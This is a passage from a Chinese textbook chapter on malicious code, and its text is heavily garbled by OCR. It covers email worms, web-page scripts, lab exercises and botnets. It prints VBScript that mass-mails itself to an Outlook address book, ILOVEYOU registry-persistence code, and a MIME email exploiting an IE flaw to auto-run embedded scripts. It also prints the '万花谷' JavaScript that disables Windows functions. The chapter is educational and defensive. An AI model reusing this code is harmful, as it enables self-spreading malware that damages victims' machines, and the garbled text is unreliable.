他 注意 : 若 要 禁止 文件 系统 对 象 ,可 以 用 下 面 的 这 条 命令 。 


regsvr32 scrrun.dll /u 


恶意 代码 需要 传播 ,电子 邮件 恶意 代码 无 疑 是 通过 电子 邮件 传播 的 。 对 于 Outlook 来 
说 ,地 址 短 的 功能 相当 不 错 , 可 是 也 给 恶意 代码 的 传播 打开 了 方便 之 门 。 几 乎 所 有 通过 
Outlook 传播 的 电子 邮件 恶意 代码 都 是 同 地 址 短 中 存储 的 电子 邮件 地 址 发 送 内 容 相 同 的 脚 
本 附件 完成 的 。 如 下 的 代码 实现 了 传播 功能 。 


Set ola = CreateObject("Outlook. Application") 
On Error Resume Next 
For x=1 To 50 
Set Mail = ola. CreateItem(0) 
Mail. to= ola. GetNameSpace( "MAPI"). AddressLists(1). AddressEntries(x) 
Mail. Subject = "Betreff der E— Mail" 
Mail. Body = "Text der E— Mail" 
Mail. Attachments. Add("C:\temp. vbs") 
Mail. Send 
Next 
ola. Quit 
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这 一 小 段 代 码 的 功能 是 向 地 址 簿 中 的 前 50 个 用 户 发 送 电 子 邮 件 , 并 将 脚本 日 己 作 为 附 
件 。 第 一 行 是 创建 一 个 Outlook 的 对 象 。 下 面 是 一 个 循环 ,在 循环 中 不 断 地 向 地 址 簿 中 的 
电子 邮件 地 址 发 送 内 容 相 同 的 信件 。 

多 数 电 子 邮件 型 恶意 代码 通过 修改 注册 表 等 信息 来 判断 各 种 条 件 及 取消 一 些 限 制 。 下 
面 的 代码 是 从 “ 爱 虫 ”中 取出 的 。 


On Error Resume Next 
// 调 整 脚本 语言 的 超时 设置 
dim wscr, rr 
set wscr = CreateObject("WScript. Shell") 
rr = wscr. RegRead ("HKEY CURRENT USER\Software\Microsoft\Windows Scripting Host\Settings\ 
Timeout") 
if (rr>=1) then 
wscr. RegWrite "HKEY CURRENT USER\Software\Microsoft\Windows Scripting 
Host\Settings\Timeout", 0, "REG DWORD" 
end if 
// 修 改 注 册 表 ,使 得 每 次 系统 启动 时 自动 执行 脚本 
regcreate 
"HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32", dirsystem &"\ 
MSKernel32. vbs" 
regcreate "HKEY LOCAL MACHINE \ Software\Microsoft\Windows\ CurrentVersion\ RunServices\ 
Win32DLL", dir win&"\Win32DLL. vbs" 
//MSKerne132.vbs 和 Win32DLL. vbs 是 病毒 脚本 的 一 个 副本 


从 上 面 可 以 看 出 ,其 实 写 一 个 通过 Outlook 传播 的 电子 邮件 恶意 代码 很 简单 ,但 是 它 作 
为 附件 传播 的 效率 可 能 就 会 打 些 折扣 。 下 面 的 一 种 方法 是 利用 IE 的 漏洞 编写 的 ,只 要 收 件 


人 的 输入 焦点 在 带 病 毒 邮 件 上 ,计算 机 就 会 被 感染 。 
From: "XXXXX” 
Subject: mail 


Date: Thu, 2 Nov 2000 13:27:33 + 0100 
MIME ~ Version: 1.0 

Content - Type: multipart/related; 
type = "multipart/alternative",; 
boundary= "1" 

二 IE 3 

X— MSMail ~ Priority: Normal 


于 | 二 

Content - Type: multipart/alternative; 
boundary= "2" 

ed ee 


Content - Type: text/html ; 

charset = "iso 一 8859 一 1” 

Content ~ Transfer ~ Encoding: quoted ~ printable 

< HIML > 

< HERAD > 

</HERD > 

< BODY bgColor = 3D# ffffff > 

< iframe src = 3Dcid:THE - CID height = 3D0 width = 3D0 ></iframe > 
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I will create the file C:\deleteme. txt < BR> 
</BODY > 
</HTML > 
Pd 4 Pd 
a a et 


Content — Type: audio/x — wav; 

name = "hello. vbs" 

Content ~ Transfer ~ Encoding: quoted - printable 

Conbent— ID: < THE— CID> 

-~ Insert 一 一 

set objFileSystem = 3D CreateObject("Scripting.FileSystemObject") 
set objOutputFile = 3D objFileSystem. CreateTextFile("C:\deleteme. txt", 1) 
objOutputFile. writeline("You can delete this file.") 
objOutputFile. close 

msgbox "I have created the file : c:\deleteme. txt" 

一 一 Insert 一 一 


上 面 的 这 个 例子 可 以 实现 只 要 将 焦点 移 到 邮件 主题 上 就 会 执行 这 个 脚本 。 因 此 这 一 漏 
洞 将 更 加 有 效 地 传播 电子 邮件 恶意 代码 。 产 生 上 面 这 个 漏洞 的 原因 是 采用 HTML 发 送 方 
式 对 背景 音乐 文件 没有 做 检查 ,导致 脚本 和 应 用 程序 等 被 执行 。 因 此 ,采用 不 同 的 编码 就 可 
以 将 脚本 、 命 令 行 命令 及 可 执行 文件 等 内 骸 在 邮件 中 。 

其 中 ,name 二 "hello. vbs" 这 个 文件 名 可 以 任意 Wi 

如 果 是 脚本 则 需要 vbs 扩展 名 ,如 果 是 命令 行 命令 则 应 该 是 bat 或 cmd 结尾 。 如 果 是 
脚本 或 文本 方式 的 命令 , 则 编码 方式 应 为 : 


Content ~ Transfer ~ Encoding: quoted - printable 


如 果 是 应 用 程序 则 文件 名 应 该 改 为 exe 扩展 名 : name 二 "hello. exe" 。 编 码 方式 应 该 改 
为 uuMime(Cbase64) 编 码 : 


Content ~ Transfer ~ Encoding: quoted ~ printable 


最 后 ,将 应 用 程序 进行 Base64 编码 插入 --insert- -与 --insert-- 之 间 , 这 样 就 构造 好 了 一 
封 邮件 。 

根据 上 面 的 知识 ,可 以 先 写 一 个 应 用 程序 型 恶意 代码 ; 接着 对 恶意 代码 程序 进行 
Base64 编码 ; 然后 下 将 这 个 编码 艇 入 到 上 面 这 封 邮 件 中 ; 最 后 各 地 址 竹中 的 电子 邮件 地 址 
发 送 这 个 电子 邮件 。 当 收 到 邮件 的 用 户 把 输入 焦点 放 在 这 个 主题 上 时 ,这 个 恶意 代码 就 会 
在 没有 任何 提示 的 情况 下 立刻 被 执行 ,执行 的 结果 和 上 面 一 样 , 先 将 目 身 编码 ,再 插入 邮件 ， 
再 问 地 址 短 中 的 电子 邮件 地 址 发 送 。 采 用 这 种 方式 ,恶意 代码 就 能 迅速 在 网 上 蔓延 。 


9.2.3 邮件 型 恶意 代码 的 预防 


电子 邮件 是 网 民 的 重要 交流 途径 ,由 它 带 来 的 恶意 代码 如 何 防范 ?防范 和 处 理 带 病毒 
邮件 的 建议 包括 以 下 几 点 。 
(1) 不 要 轻易 打开 卫生 人 来 信 中 的 附件 文件 。 当 收 到 陌生 人 寄 来 的 一 些 目 称 是 “不 可 
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不 看 ”的 有 趣 内 容 时 , 千 万 不 要 不 假 思 索 地 贸然 打开 它 ,尤其 对 于 一 些 EXE 之 类 的 可 执行 程 


序 文件 ,就 更 要 慎之 又 慎 。 
(2) 对 于 比较 熟悉 的 朋友 寄 来 的 信件 ,如果 其 信 中 夹带 了 程序 附件 ,但 是 他 却 没有 在 信 
中 提 及 或 是 说 明 , 也 不 要 轻易 打开 。 因 为 可 能 有 些 恶意 代码 是 偷偷 地 附着 上 去 的 一 一 也 许 


他 的 计算 机 已 经 染 毒 了 ,可 他 自己 却 不 知道 “Happy 99” 就 是 这 样 的 恶意 代码 , 它 会 自我 复 
制 ,跟着 邮件 走 。 

(3) 切忌 盲目 转发 。 当 收 到 茶 些 和 目 认 为 有 趣 的 邮件 时 ,有 些 人 还 来 不 及 细 看 就 打开 通 
信 簿 给 日 己 的 每 一 位 朋友 都 转发 一 份 ,这 极 有 可 能 使 恶意 代码 制造 者 的 恶 行 得 介 ,而 你 的 朋 
友 对 你 发 来 的 信件 无 疑 是 不 会 产生 怀疑 的 ,结果 你 无 意 中 成 了 恶意 代码 传播 者 。 

(4) 去 掉 Windows 脚本 执行 功能 。 相 当 一 部 分 的 流行 网 络 蠕虫 程序 是 利用 了 
Windows 的 脚本 语言 来 感染 计算 机 系统 的 。 为 了 避免 这 种 情况 的 发 生 , 可 将 该 功能 去 挥 
(执行 Windows 98 系统 下 的 "设置 ?一 控制 面板 ”一 ”添加 /删除 程序 ”一 ”Windows 安静 程 
序 ”- 一 附件 ?一 Windows Scripting Host 命令 ,将 该 功能 去 掉 )。 该 功能 是 随 着 IE 5. 0 或 者 
操作 系统 直接 安装 到 系统 中 的 。 一 般 的 计算 机 系统 正 篆 运行 并 不 需要 该 功能 ,因此 可 以 删 
除 该 功能 ,如 果 需 要 可 以 随时 再 加 上 。 

在 Windows 2000 下 ,禁止 FileSystemObject 这 个 对 象 就 可 以 很 有 效 地 控制 这 种 恶意 
代码 的 传播 。 下 面 的 这 条 命令 可 以 禁止 文件 系统 对 象 : 


regsvr32 scrrun.dll /u 


0 警告 ”如果 在 使 用 DotNet 进行 Web 应 用 程序 开发 ,请 不 要 使 用 该 方法 。 它 会 影响 其 
他 程序 的 运行 。 
这 样 做 的 结果 是 扩展 名 称 为 vbs 的 文件 不 能 日 动 运行 ,在 一 定 程度 上 避免 了 流行 恶意 
代码 的 传播 。 


(5) 对 于 利用 文件 的 扩展 名 做 文 曹 的 恶意 代码 ,不 要 隐藏 系统 中 已 知 文件 类 型 的 扩展 
名 称 。Windows 操作 系统 默认 的 是 “隐藏 已 知 文件 类 型 的 扩展 名 称 ”。 用 户 可 以 改 为 显示 
所 有 文件 类 型 的 扩展 名 称 。 当 然 Windows 系统 下 对 于 一 些 特别 的 文件 的 扩展 名 (如 “ 垃 专 
虫 ”(Scrapworm) 利 用 的 shs 扩展 名 称 ) ,即使 修改 了 系统 设置 还 是 不 能 显示 其 扩展 名 称 。 

(6) 将 系统 的 网 络 连接 安全 级 别 至 少 设置 为 “中 等 ”, 它 可 以 在 一 定 程度 上 预防 某 些 有 
害 的 Java 程序 或 者 某 些 ActiveX 组 件 对 计算 机 的 侵害 。“ 控 制 面板 ”中 的 Internet 项 目 中 
有 “安全 ”标签 ,会 出 现 Internet 项 的 安全 级 别 设置 窗口 ,在 其 中 可 以 进行 级 别 设置 。 

(7) 利用 工具 。 可 用 的 工具 软件 有 很 多 ,如 360、“ 卡 巴 斯 基 ”瑞星 ”诺顿 ”等 杀毒 工具 
都 具有 监控 邮箱 的 功能 。 


9.3 ” WebPage 中 的 恶意 代码 


WebPage 中 的 恶意 代码 主要 是 指 茶 些 网 站 使 用 的 恶意 代码 。 这 些 代 码 打 着 给 用 户 加 
深 “ 印 象 * 和 提供 “方便 ”的 旗号 做 令 人 厌恶 的 事情 。 例 如 ,有 些 网 站 修改 IE 浏览 副 设 置 ,使 
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用 户 默认 连接 该 网 站 等 。 虽 然 有 些 网 站 可 能 是 出 于 善意 ,但 是 过 分 地 使 用 就 会 扰乱 用 户 正 
和 使 用 计算 机 ,这 就 理所当然 成 为 恶意 代码 了 。 


9.3.1 脚本 病毒 的 基本 类 型 


1. 基于 JavaScript 的 恶意 脚本 

使 用 JavaScript 语言 编写 的 恶意 代码 主要 运行 在 IE 浏览 器 环境 中 ,可 以 对 浏览 器 的 设 
置 进行 修改 ,主要 破坏 是 对 注册 表 的 修改 ,危害 不 是 很 大 。 

2. 基于 VBScript 的 恶意 脚本 

使 用 VBScript 语言 的 恶意 代码 可 以 在 浏览 大 中 运行 。 更 重要 的 是 : 这 种 恶意 代码 和 
普通 的 宏 病毒 并 没有 非常 清晰 的 界限 ,可 以 在 Office, 主要 是 浏览 希 、Outlook 中 运行 ,可 以 
执行 的 操作 非常 多 ,甚至 可 以 修改 人 硬盘 上 的 文件 .删除 文件 和 执行 程序 等 ,危害 非常 大 。 

3. 基于 PHP 的 恶意 脚本 

基于 PHP 的 恶意 脚本 是 新 的 恶意 代码 类 型 ,感染 PHP 脚本 文件 ,主要 对 服务 器 造成 
影 啊 ,对 个 人 计算 机 影 啊 不 大 ,目前 仅 有 一 个 “新 世界 *(NewWorld) 恶 意 代 码 , 但 它 并 没有 
造成 很 大 的 破坏 ,但 是 前 景 难以 估计 ,如 果 PHP 得 到 更 加 广泛 的 使 用 ,这 种 病毒 将 成 为 真 
正 的 威胁 。 

4. Shell 恶意 脚本 

编写 Shell 恶意 脚本 是 一 种 制造 Linux 恶意 代码 的 简单 方法 。 在 UNIX 1989 卷 2 上 便 
可 以 看 到 Tom Duff 和 M. Douglas Mcllroy 编写 的 脚本 恶意 代码 。Shell 恶意 脚本 的 危害 
性 不 会 很 大 ,并 且 它 本 身 极 易 被 发 现 ,因为 它 是 以 明文 方式 编写 并 执行 的 。 但 通常 一 个 用 户 
会 深信 不 疑 地 去 执行 任何 脚本 ,而 且 不 会 过 问 该 脚本 的 由 来 ,这 样 ,这 些 用 户 便 成 为 攻击 的 
目标 了 。 


9.3.2 Web 恶意 代码 的 工作 机 制 


本 节 主 要 介绍 恶意 代码 中 的 一 种 一 一 在 网 页 中 用 脚本 实现 的 恶意 代码 。 由 于 因特网 用 
户 经 常 使 用 浏览 需 浏 览 网 页 ,因此 给 这 种 恶意 代码 的 发 作 造 成 了 便利 环境 。“ 万 花 谷 ”就 是 
其 中 一 种 。 如 果 在 因特网 上 看 到 一 个 美丽 诱 人 的 网 址 “万 花 谷 ”, 请 不 要 轻易 碰 它 ,这 实际 是 
一 个 恶意 “陷阱 ”。 如 果 经 不 住 诱惑 ,只 要 用 鼠标 轻 轻 一 点 ,你 的 计算 机 就 立即 瘫痪 了 。 这 就 
是 著名 的 “万 花 谷 ”, 它 是 利用 JavaScript 技术 进行 破坏 的 一 个 恶意 网 址 。 感 染 了 该 恶意 代 
码 后 的 特征 如 下 。 

(1) 不 能 正常 使 用 Windows 的 DOS 功能 程序 。 

(2) 不 能 正常 退出 Windows。 

(3)“ 开 始 ” 菜 单 上 的 “关闭 ”运行 ” 等 栏目 被 屏蔽 ,禁止 重新 以 DOS 方式 启动 ,关闭 
DOS 命令 和 Regedit 命令 等 。 

(4) 将 下 浏览 器 的 首页 和 收藏 夹 中 都 加 入 了 含有 该 有 害 网 页 代码 的 网 络 地 址 (网 络 地 
址 是 www. on888. xxx. XXX. com) 。 

(5) 在 IE 的 收藏 夹 中 自动 加 上 “万 花 谷 ”的 快捷 方式 ,网 络 地 址 是 http://96xx. 


XXX. COIM。 
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从 恶意 代码 的 源 代码 来 看 “万 伦 谷 "并 不 是 一 个 真正 意义 上 的 恶意 代码 ,因为 除了 一 些 
简单 的 破坏 作用 之 外 , 它 不 具有 恶意 代码 的 其 他 特征 (如 传播 性 )。 “万 伦 谷 "是 散在 HTML 


网 页 中 的 一 段 Java 脚本 程序 , 它 最 初出 现在 http://on888. home. chinaren. com 个 人 网 站 
上 ,随后 ,其 他 一 些 个 人 主页 也 被 感染 了 该 恶意 代码 。 与 普通 恶意 脚本 有 所 不 同 的 是 : 用 
“查看 源 文 件 ” 方 法 来 查看 感染 “万 花 谷 ” 的 网 页 代码 时 ,只 能 看 到 一 大 段 杂 乱 字 从。 原因 是 
为 了 具有 隐蔽 性 ,该 恶意 代码 采用 了 JavaScript 的 escape() 图 数 进行 了 字符 处 理 , 把 基 些 符 
号 、 汉字 等 变 成 乱码 以 达到 迷惑 人 的 目的 。 程 序 运行 时 再 调用 unescape() 解 公 到 本 地 计算 
机 上 运行 。 

恶意 代码 利用 了 下 面 这 段 JavaScript 代码 修改 了 HKLMA Software\ Microsoft\ 
Internet Explorer\ Main\ 和 和 HKCU\ Software\ Microsoft\Internet Explorer\ Main\ 中 的 
Window Title 这 个 键 的 值 。 同 时 ,还 修改 了 用 户 的 许多 IE 设置 ,如 消除 “运行 ”按钮 消除 
“关闭 ”按钮 .消除 “注销 ?按钮 .隐藏 和 面 、 隐藏 盘 符 及 禁用 注册 表 等 。 以 下 就 是 这 个 恶意 代 
码 的 源 代码 。 


document. write(""); 
// 该 耻 数 是 先 在 收藏 夹 里 增加 一 个 站 点 
function AddFavLnk( loc, DispName, SiteURL) 
{ 
Var Shor = Shl. CreateShortcut(loc + "\\" + DispName + ".URL"); 
Shor. TargetPath = SiteURL; 
Shor. Save( ) ; 
} 
// 该 函数 是 病毒 的 主 函数 ,实现 COOKIES 检查 .注册 表 修 改 等 
function fl( ){ 
try 
{ 
// 声 明 一 个 ActivexX 对 象 
ActiveX initialization 
al = document. applets[0]; 
al. setCLSID(" {F935DC22 - 1CF0 - 11D0 - RDB9 - 00C04FD58RAOB}”) ; 
// 创 建 几 个 实例 
al. createInstance( ) ; 
Shl = al. GetObject( ) ; 
al. setCLSID("{0D43FE01 ~ F093 ~ 11CF ~ 8940 - 00A0C9054228}"); 
al. CreateInstancel( ) ; 
FSO = al. GetObject( ) ; 
al. setCLSID(" {F935DC26 - 1CF0 ~ 11D0 - RDB9 - 00C04FD58A0B}" ); 
al. createInstance( ) ; 
Net = al. GetObject( ); 
try 
{ 
if (documents .cookies. indexOf("Chg") == —1) 
{ 
// 设 置 IE 起 始 页 
Shl. RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", 
"http://www. on888. home. chinaren. com/" ); 
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// 设 置 COOKIES 
Var expdate = new Date( (new Date( ) ) . getTime() + (1)); 
documents .cookies = "Chg = general; expires =" + expdate.toGMTString() + "; path=/;" 
// 消 除 RUN 按钮 
Sh1. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\Explorer\\NoRun", 01, "REG BINARY"); 
// 消 除 "关闭 "按钮 
Sh1. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\Explorer\\NoClose", 01, "REG BINARY"); 
// 消 除 "注销 "按钮 
Shl. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\Explorer\\NoLogOff", 01, "REG BINARY"); 
// 隐 藏 盘 符 
Sh1. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\Explorer\\NoDrives", "63000000", "REG DWORD"); 
// 禁 用 注册 表 
Sh1. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\System\\DisableRegistryTools", "00000001", "REG DWORD" ) ; 
// 禁 止 运行 DOS 程序 
Sh1. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\WinOldApp\\Disabled", "00000001", "REG_DWORD"); 
// 禁 止 进入 DOS 模式 
Shl. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\WinOldApp\\NoRealMode", "00000001", "REG DWORD"); 
// 开 机 提示 窗口 标题 
Shl. RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon 
\\LegalNoticeCaption", "你 已 经 中 毒 …"); 
// 开 机 提示 窗口 信息 
Sh1. RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon 
\\LegalNoticeText", "你 已 经 中 毒 …"); 
// 设 置 IE 标题 
Shl. RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", 
"你 已 经 中 毒 …"); 
Sh1. RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", 
"你 已 经 中 毒 …"); 
} 
} 
catch(e) 
{} 
} 
catch( e) 
{} 
} 
// 初 始 化 函数 
function init() 
{ 
setTimeout("f()", 1000); 
} 
// 开 始 执行 
了 了 七 由 
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9.3.3 Web 恶意 代码 实验 


实验 一 

【实验 目的 】 

擎 握 网 页 恶意 代码 的 基本 原理 。 
【实验 环境 】 


(1) Windows XP 操作 系统 。 

(2) ] 匡 浏览 锅 。 

【实验 步骤 了】 

(1) 从 光盘 上 复制 实验 文件 到 实验 的 计算 机 上 (源码 位 置 : 本 书 配套 系 材 目录 
\Experiment\IEMalware \1. html) 。 

(2) 用 IE 打开 该 文件 ,IE 不断 地 打开 163 网 页 。 

(3) 如 果 I 正 阻 止 了 显示 内 容 , 右 击 出 现 的 提示 信息 ,在 弹出 的 快捷 菜单 中 选择 “允许 阻 
止 的 内 容 ” 命 令 ,就 可 以 看 到 实验 现象 。 


【程序 源码 】 

本 书 配 套 素材 目录 \Experiment\IEMalware\1. html。 
实验 二 

【实验 目的 】 

掌握 网 页 恶意 代码 的 基本 原理 。 

【实验 环境 】 


(1) Windows XP 操作 系统 。 

(2) IE 浏览 融 。 

【实验 步 又 】 

(1) 从 光盘 上 复制 实验 文件 到 实验 计算 机 上 (源码 位 置 本 书 配 套 素材 目录 
\Experiment\IE Malware \2. html) 。 

(2) IE 显示 的 地 方 出 现 黑 日 颜色 不 断 地 内 动 。 

(3) 如 果 I 阻止 了 显示 内 容 , 布 击 出 现 的 提示 信息 ,在 弹出 的 快捷 菜单 中 选择 “允许 阻 
止 的 内 容 ” 命 令 ,就 可 以 看 到 实验 现象 。 

【程序 源码 】 

参见 本 书 配 套 素材 日 录 \Experiment\IEMalware\2. html。 


9.4 僵尸 网 络 


在 我 国 的 湖南 西部 有 神秘 英 测 的 赶 尸 传说 , 即 湘西 赶 尸 。 湘 西 赶 己 也许 是 一 种 神秘 的 
和 巫 本 ,也许 是 愚弄 人 的 一 种 迷信 ,也许 只 是 为 了 骗取 钱财 的 把 戏 , 也 许 仅仅 是 一 种 竺 人 听闻 
的 传闻 。 但 在 计算 机 领域 ,僵尸 网 络 是 确实 存在 的 。 

在 僵尸 网 络 中 ,众多 被 人 侵 的 计算 机 像 僵 尸 群 一 样 被 人 驱赶 和 指挥 着 ,成 为 被 人 利用 的 
一 种 工具 。2016 年 爆发 的 Mirai 是 近年 来 比较 有 名 的 僵尸 病毒 。Mirai 可 以 高 效 扫描 物 联 
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网 系统 设备 ,感染 采用 出 三 密码 设置 或 弱 密 码 加 密 的 脆弱 物 联网 设备 ,被 病毒 感染 后 ,设备 
成 为 僵尸 网 络 机 硕 人 后 在 黑客 命令 下 发 动 高 强度 僵尸 网 络 攻击 。 
1. 僵尸 网 络 的 概念 


僵尸 网 络 (Botnet) 是 指控 制 者 采用 一 种 或 多 种 传播 手段 ,将 Bot 程序 (僵尸 程序 ) 传 播 
给 大 批 计算 机 ,从 而 在 控制 者 和 被 感染 计算 机 之 间 所 形成 的 一 个 可 一 对 多 控制 的 网 络 。 控 
制 者 通过 各 种 途径 传播 僵尸 程序 并 感染 互联 网 上 的 大 量 主机 ,而 被 感染 的 主机 将 通过 一 个 
控制 信道 接收 控制 者 的 指令 ,并 执行 该 指令 。 

在 僵尸 网 络 领域 ,Bot 是 Robot 的 缩写 ,是 指 实现 恶意 控制 功能 的 程序 代码 ;“ 伪 尸 计 
算 机 ”就 是 被 植 人 了 Bot 程序 的 计算 机 ;“ 控 制服 务 器 ”(Control Server) 是 指控 制 和 通信 的 
中 心服 务 需 ,在 基于 IRC(Internet Relay Chat,IRC) 协 议 进行 控制 的 伪 尸 网 络 中 ,就 是 指 提 
供 IRC 聊天 服务 的 服务 器 。 

僵尸 网 络 是 互联 网 上 被 攻击 者 集中 控制 的 一 群 计算 机 。 攻 击 者 可 以 利用 僵尸 网 络 发 起 
大 规模 的 网 络 攻 击 ,如 DDoS 海量 垃圾 邮件 等 。 此 外 ,僵尸 计算 机 所 保存 的 信息 ,如 银行 账 
号 和 口令 等 也 都 可 被 控制 者 轻松 获得 。 因 此 ,不 论 是 对 网 络 安全 还 是 对 用 户 数据 安全 来 说 ， 
僵尸 网 络 都 是 极 具 威胁 的 恶意 代码 。 伪 尸 网 络 也 因此 成 为 目前 国际 上 十 分 关注 的 安全 问 
题 。 然 而 ,发 现 一 个 僵尸 网 络 是 非常 困难 的 ,因为 黑客 通常 远程 .隐蔽 地 控制 分 散在 网 络 上 
的 僵尸 计算 机 ,这 些 计算 机 的 用 户 往往 并 不 知情 。 因 此 ,僵尸 网 络 是 目前 互联 网 上 最 受 黑客 
青睐 的 工具 。 

2. 僵尸 网 络 的 特点 

僵尸 网 络 主要 具有 以 下 特点 。 

(1) 分 布 性 。 僵 尸 网 络 是 一 个 具有 一 定 分 布 性 的 .逻辑 的 网 络 , 它 不 具有 物理 折 扑 结 
构 。 随 看 Bot 程序 的 不 断 传播 而 不 断 有 新 的 僵尸 计算 机 添加 到 这 个 网 络 中 来 。 

(2) 晋 意 传 播 。 僵 尸 网 络 是 采用 了 一 定 的 恶意 传播 手段 形成 的 ,如 主动 漏洞 攻击 、 恶 意 
邮件 等 各 种 传播 手段 ,都 可 以 用 来 进行 Bot 程序 的 传播 。 

(3) 一 对 多 控制 。Botnet 的 最 主要 的 特点 就 是 可 以 一 对 多 地 进行 控制 ,传达 命令 并 执 
行 相同 的 恶意 行为 ,如 DDoS 攻击 等 。 这 种 一 对 多 的 控制 关系 使 得 攻击 者 能 够 以 低廉 的 代 
价 高 效 地 控制 大 量 的 资源 为 其 服务 ,这 也 是 Botnet 攻击 受到 黑客 青睐 的 根本 原因 。 

3. 僵尸 网 络 的 发 展 过 程 

在 早期 的 IRC 聊天 网 络 中 ,防止 频道 被 滥用 、 管 理 权限 .记录 频道 事件 等 一 系列 功能 都 
可 以 由 管理 者 编写 的 智能 程序 所 完成 。 于 是 在 1993 年 ,在 IRC 聊天 网 络 中 出 现 了 一 款 Bot 
工具 (Eggdrop)。Eggdrop 是 第 一 个 Bot 程序 ,能 够 帮助 用 户 方 便 地 使 用 IRC 聊天 了 网络。 
尽管 Eggdrop 的 功能 是 良性 的 ,然而 黑客 学 习 并 利用 这 个 设计 思路 编写 出 了 带 有 恶意 行为 
的 Bot 工具 ,开始 对 大 量 的 受害 主机 进行 控制 ,利用 它们 的 资源 以 达到 恶意 攻击 的 目标 。 

20 世纪 90 年 代 末 , 随 着 DDos 的 成 熟 , 出 现 了 大 量 分 布 式 拒绝 服务 攻击 工具 (如 TFN、 
TFN2K 和 Trinoo 等 ) 。 攻 击 者 利用 这 些 工 具 控制 大 量 的 被 感染 主机 ,发动 DDoS 攻击 。 而 
这 些 被 控 主 机 从 一 定 意义 上 来 说 已 经 具有 了 Botnet 的 雏形 。 

1999 年 ,在 第 八 届 DEFCON 年 会 上 发 布 的 SubSeven 2. 1 版 开始 使 用 IRC 协议 构建 攻 
击 者 对 僵尸 主机 的 控制 信道 ,也 成 为 第 一 个 真正 意义 上 的 Bot 程序 。 随 后 基于 IRC 协议 的 
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Bot 程序 的 大 量 出 现 ( 如 GTBot、Sdbot 等 ) ,使 得 基于 IRC 协议 的 Botnet 成 为 主流 。 

2003 年 之 后 , 随 着 蠕虫 技术 的 不 断 成 熟 , Bot 的 传播 开始 使 用 蠕虫 的 主动 传播 技术 ,从 
而 能 够 快速 构建 大 规模 的 Botnet。 其 中 ,著名 的 僵尸 网 络 有 2004 年 爆发 的 Agobot/Gaobot 
和 rBot/Spybot。 同 年 出 现 的 Phatbot 则 在 Agobot 的 基础 上 ,开始 独立 使 用 P2P 结构 构建 
控制 信道 。 

从 良性 Bot 的 出 现 到 恶意 Bot 的 实现 ,从 被 动 传 播 到 利用 蠕虫 技术 主动 传播 ,从 使 用 简 
单 的 IRC 协议 构成 控制 信道 到 构建 复杂 多 变 P2P 结构 的 控制 模式 ,Botnet 逐渐 发 展 成 规模 
庞大 功能 多 样 .不 易 检 测 的 恶意 网 络 , 给 当前 的 网 络 安全 市 来 了 不 容 忽视 的 威胁 。 

4. 僵尸 网 络 的 工作 过 程 

一 般 而 言 ,Botnet 的 工作 过 程 包括 传播 .加 入 和 控制 3 个 阶段 。 

1) 传播 阶段 

在 传播 阶段 ,Botnet 把 Bot 程序 传播 到 尽 可 能 多 的 主机 上 去 。Botnet 需要 的 是 具有 一 
定 规模 的 被 控 计 算 机 ,而 这 个 规模 是 随 着 Bot 程序 的 扩散 而 形成 的 。 在 这 个 传播 过 程 中 有 
如 下 几 种 手段 。 

(1) 即时 通信 软件 。 利 用 即时 通信 软件 问好 友 列 表 发 送 执行 僵尸 程序 的 链接 ,并 通过 
社会 工程 学 技巧 诱骗 其 点 击 , 从 而 进行 感染 。 例 如 2005 年 初 爆发 的 “MSN 性 感 鸡 ” 
(Worm. MSNLoveme. b) 采 用 的 就 是 这 种 方式 。 

(2) 邮件 型 恶意 代码 。Bot 程序 还 会 通过 发 送 大 量 的 邮件 型 恶意 代码 传播 目 身 , 通 稼 
表现 为 在 邮件 附件 中 携带 僵尸 程序 及 在 邮件 内 容 中 包含 下 载 执行 Bot 程序 的 链接 ,并 通过 
一 系列 社会 工程 学 的 技巧 诱 使 接收 者 执行 附件 或 打开 链接 ,或 者 是 通过 利用 邮件 客户 端的 
漏洞 月 动 执 行 ,从 而 使 得 接收 者 主机 被 感染 成 为 僵尸 主机 。 

(3) 主动 攻击 漏洞 。 其 原理 是 通过 攻击 目标 系统 所 存在 的 漏洞 获得 访问 权 , 并 在 
Shellcode 执行 Bot 程序 注入 代码 ,将 被 攻击 系统 感染 成 为 僵尸 主机 。 属 于 此 类 的 最 基本 的 
感染 途径 是 攻击 者 手动 地 利用 一 系列 黑客 工具 和 脚本 进行 攻击 ,获得 权限 后 下 载 Bot 程序 
执行 。 攻 击 者 还 会 将 僵尸 程序 和 晴 虫 技术 进行 结合 ,从 而 使 Bot 程序 能 够 进行 上 月 动 传播 ,者 
名 的 Bot 样本 Agobot ,就 实现 了 Bot 程序 的 自动 传播 。 

(4) 恶意 网 站 脚本 。 攻 击 者 在 提供 Web 服务 的 网 站 中 在 HTML 页 面 上 绑 定 恶意 的 脚 
本 , 当 访 问 者 访问 这 些 网 站 时 就 会 执行 恶意 脚本 ,使 得 Bot 程序 下 载 到 主机 上 ,并 被 自动 执行 。 

(5) 特洛伊 木马 。 伪 小 成 有 用 的 软件 ,在 网 站 、FTP 服务 右 、P2P 网 络 中 提供 ,诱骗 用 户 
下 载 并 执行 。 

通过 以 上 几 种 传播 手段 可 以 看 出 ,在 Botnet 的 形成 过 程 中 ,其 传播 方式 与 蠕虫 及 功能 
复杂 的 间谍 软件 很 相近 ，。 

2) 加 入 阶段 

在 加 入 阶段 ,每 一 台 被 感染 主机 都 会 随 着 隐藏 在 和 月 身上 的 Bot 程序 的 发 作 而 加 入 到 
Botnet 中 去 ,加 入 的 方式 根据 控制 方式 和 通信 协议 的 不 同 而 有 所 不 同 。 在 基于 IRC 协议 的 
